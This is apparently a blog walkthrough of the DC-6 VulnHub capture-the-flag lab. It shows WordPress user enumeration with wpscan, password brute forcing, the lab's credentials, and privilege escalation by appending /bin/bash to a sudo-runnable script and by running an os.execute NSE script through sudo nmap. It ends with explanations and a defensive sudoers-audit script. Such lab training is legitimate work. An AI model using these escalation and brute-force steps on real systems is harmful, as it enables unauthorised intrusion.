DC-6 problem solution

1. Collect information

1. IP: 192.168.10.16

The VM network mode selected is net, with the address assigned automatically.

2. Ports

Only two common ports are open: 22 (SSH) and 80 (HTTP).

2. Vulnerability detection

dirsearch -u http://192.168.10.16

index.php can be used to view the page framework (according to the guide I should not have been able to access it; this may be where it gets stuck).

I searched the Internet for WordPress vulnerabilities and found one that may be useful later, so I am noting it here. The author said there was a vulnerability in the login; see the following blog for details. I continued exploring on my own.

Wordpress vulnerability reappears_Liu Zheng2001’s blog-CSDN blog

It didn't work after trying.

But! I wondered why I couldn't log in. I thought it was a problem with my computer; it was the first time I had run into this kind of thing, so I went to Baidu.

From what I found online: the site is reachable, but it automatically redirects to the hostname wordy, which cannot be resolved, so it cannot be accessed. You need to add a domain name mapping.

Add a hosts entry for the domain name:

vim /etc/hosts

192.168.10.16 wordy

I visited again and found that I was now reaching wordy.

But what is the difference between www.wordy.com and this one? This is it:

I learned something new and used it:

wpscan --url http://wordy/ --enumerate u
--enumerate u enumerates WordPress user names

The scan turned up several user names; these are the accounts used to log in to the site:

admin

Jens

graham

mark

sarah

I have learned cewl before, so I gave it a try:

cewl http://192.168.10.16 --debug -w /etc/dc-6/cewl_user.txt
--debug prints extra debugging output

It failed; nothing was found.

Find a place wide enough to land

Tried SQL injection with a "universal password" (login bypass string); the login failed.

I went online to look for vulnerabilities and to brute-force. Now that the accounts are known, only the passwords need to be brute-forced.

I had the wrong idea when using searchsploit, but I still want to write about it. This is used after getting in.

No usable exploits were found.

Hint location: DC: 6 ~ VulnHub

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

On Kali the wordlist ships compressed, so decompress it first:

gzip -d /usr/share/wordlists/rockyou.txt.gz

Pay attention to the path!

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

It was cracked with a weak password; wpscan's brute force found:

mark / helpdesk01

Let's try SSH login; these may also be the account and password for the web page.

The SSH login failed. They should be for the web page after all, since they were found by wpscan against it.

It's not this page, it's this one:

searchsploit Activity monitor

Then submit it.

No, it wasn't detected.

Do the RCE manually:

python -c 'import pty;pty.spawn("/bin/bash")'

First, sudo -l

Nothing, but it asked me to enter a password.

New credentials found:

User: graham

Password: GSo7isUM1D4

3. Vulnerability verification

You can see there are some permissions to run as jens!!!!

Check the file's contents: it is used to decompress files. Let's try to see whether we can write to it.

The file belongs to the user jens.

echo "/bin/bash" >> /home/jens/backups.sh

sudo -u jens /home/jens/backups.sh

nmap, an executable file

Successful.

The flag is read with cat ./theflag.txt; no need to go into the root directory.

Questions

1. Why do you need to add a domain name to access index.php?

2. I copied the two commands for horizontal privilege escalation and don't quite understand them.

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

Originally this script only performed the decompression; after /bin/bash is appended, running the script also launches a shell, and that shell runs as whichever user executed the script (here jens, via sudo -u jens).

1) Why don't you need to enter a password when running sudo -u jens /home/jens/backups.sh?

The -u jens parameter specifies that the following command is executed as the jens user. This means the command runs in jens's context, with the permissions and configuration associated with that user.

In some cases, when you run a command or script with sudo, the system skips the password prompt depending on its configuration. This requires that the sudoers rule matching your account carries the NOPASSWD tag. When that rule does not require password authentication, you are not prompted for a password when executing the sudo command.
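To make the sudoers behaviour concrete from the defender's side, here is an added example (not code from the original write-up) that parses sudoers rules and flags the two conditions this box illustrates: a NOPASSWD rule that runs something as root, and a sudo target that lives under a user-writable directory such as a home directory, where its owner can edit what gets executed. The sudoers content below is constructed for the example; the real DC-6 sudoers file is never shown in the write-up.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample sudoers content (hypothetical). It reproduces only the two
# behaviours described in the write-up: graham runs a script in jens's home as
# jens, and jens runs nmap as root, both without a password.
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults    env_reset
root    ALL=(ALL:ALL) ALL
graham  ALL=(jens) NOPASSWD: /home/jens/backups.sh
jens    ALL=(root) NOPASSWD: /usr/bin/nmap
sarah   ALL=(ALL) ALL
"""

# Shape of a user specification: user  hosts=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+"
    r"(?P<hosts>[^=\s]+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Directories an unprivileged user can normally write to. A sudo target under one
# of these can be modified by its owner and then run with the runas user's rights.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class SudoRule:
    user: str
    hosts: str
    runas: str
    nopasswd: bool
    commands: List[str]


def parse_sudoers(text: str) -> List[SudoRule]:
    """Parse plain user specifications; comments, Defaults and aliases are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m.group("tags").upper()
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append(SudoRule(m.group("user"), m.group("hosts"),
                              m.group("runas"), "NOPASSWD:" in tags, cmds))
    return rules


def audit_rules(rules: List[SudoRule]) -> List[str]:
    """Return human-readable findings for the risky patterns described above."""
    findings = []
    for r in rules:
        for cmd in r.commands:
            path = cmd.split()[0]          # drop any argument restriction
            if r.nopasswd and r.runas in ("root", "ALL", "ALL:ALL"):
                findings.append(f"{r.user}: NOPASSWD rule runs {path} as root")
            if path.startswith(USER_WRITABLE_PREFIXES):
                findings.append(
                    f"{r.user}: sudo target {path} lives under a user-writable "
                    f"directory (runas {r.runas})")
    return findings


if __name__ == "__main__":
    for finding in audit_rules(parse_sudoers(SAMPLE_SUDOERS)):
        print(finding)
```

On a real host the same functions can be fed the output of `visudo -c -f` or the contents of /etc/sudoers and /etc/sudoers.d/*; the fix for the second finding is to keep sudo targets root-owned in a root-owned directory (or to drop the rule), and for the first to require a password or restrict the allowed arguments.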

2) I don't quite understand this command used during vertical privilege escalation.

echo "os.execute('/bin/bash')">/tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

os.execute('/bin/bash') is a line of Lua code used to execute a specified command or script on the computer. In this example, it starts a new Bash shell.

Specifically, os.execute() is a Lua function that runs a command on the operating system. Here, '/bin/bash' is the command to be executed, which is the path used to start the Bash shell. When this function executes, it starts a new Bash shell process, connects the user to that shell, and allows them to run commands in it. Because nmap itself is started through sudo, the shell it spawns inherits root privileges, which is what makes this step a vertical escalation.

Logged-in users can have /bin/bash as their default login shell. When a user successfully logs in to a Linux system, the system starts an interactive shell process for that user to accept input and execute commands. Bash is the default shell on most Linux systems, so the default shell for logged-in users is usually /bin/bash.

Users can change their default shell by setting the login shell in the /etc/passwd file. This file contains the account information of all users in the system, including user name, user ID, group ID, login shell, etc.

In the /etc/passwd file, each user's entry is one line of colon-separated fields, with the seventh field giving the default login shell. For most interactive users this field is set to /bin/bash so that they get a Bash shell after logging in; service accounts usually get /usr/sbin/nologin or /bin/false instead.

For example, a typical user entry for a /etc/passwd file might look like this:

john:x:1000:1000:John Doe:/home/john:/bin/bash

In the example above, the default login shell for user "john" is /bin/bash. Therefore, when "john" logs into the system, a Bash shell process is started in which the user can execute commands, run scripts, and so on.


Source: blog.csdn.net/m0_71274136/article/details/132119169